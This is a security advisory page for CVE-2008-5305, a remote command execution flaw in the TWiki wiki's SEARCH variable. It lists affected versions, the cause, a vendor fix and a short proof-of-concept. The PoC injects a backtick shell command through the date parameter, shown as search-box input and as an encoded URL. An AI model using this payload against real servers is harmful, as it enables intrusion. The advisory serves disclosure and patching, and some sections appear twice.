TWiki SEARCH Variable Remote Command Execution Vulnerability
BID:32668
Info
TWiki SEARCH Variable Remote Command Execution Vulnerability
| Bugtraq ID: | 32668 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5305 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 06 2008 12:00AM |
| Updated: | Dec 08 2008 09:31PM |
| Credit: | Troy Bollinger of IBM Internet Security Systems |
| Vulnerable: |
TWiki TWiki 4.2.3 TWiki TWiki 4.2.2 TWiki TWiki 4.2.1 TWiki TWiki 4.2 TWiki TWiki 4.1.2 TWiki TWiki 4.1.1 TWiki TWiki 4.1 TWiki TWiki 4.0.5 TWiki TWiki 4.0.4 TWiki TWiki 4.0.3 TWiki TWiki 4.0.2 TWiki TWiki 4.0.1 TWiki TWiki 0 |
| Not Vulnerable: |
TWiki TWiki 4.2.4 |
Discussion
TWiki SEARCH Variable Remote Command Execution Vulnerability
TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
TWiki is prone to a vulnerability that attackers can leverage to execute arbitrary commands in the context of the application. This issue occurs because the application fails to adequately sanitize user-supplied input.
Successful attacks can compromise the affected application and possibly the underlying computer.
Exploit / POC
TWiki SEARCH Variable Remote Command Execution Vulnerability
Attackers can exploit the issue via a browser.
The following examples are available:
Enter the following in the application's search box:
%SEARCH{ date="P`pr -?`" search="xyzzy" }%
http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all
Attackers can exploit the issue via a browser.
The following examples are available:
Enter the following in the application's search box:
%SEARCH{ date="P`pr -?`" search="xyzzy" }%
http://www.example.com/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all
Solution / Fix
TWiki SEARCH Variable Remote Command Execution Vulnerability
Solution:
The vendor has released an advisory and patch to address this issue. Please see the references for more information.
Solution:
The vendor has released an advisory and patch to address this issue. Please see the references for more information.
References
TWiki SEARCH Variable Remote Command Execution Vulnerability
References:
References: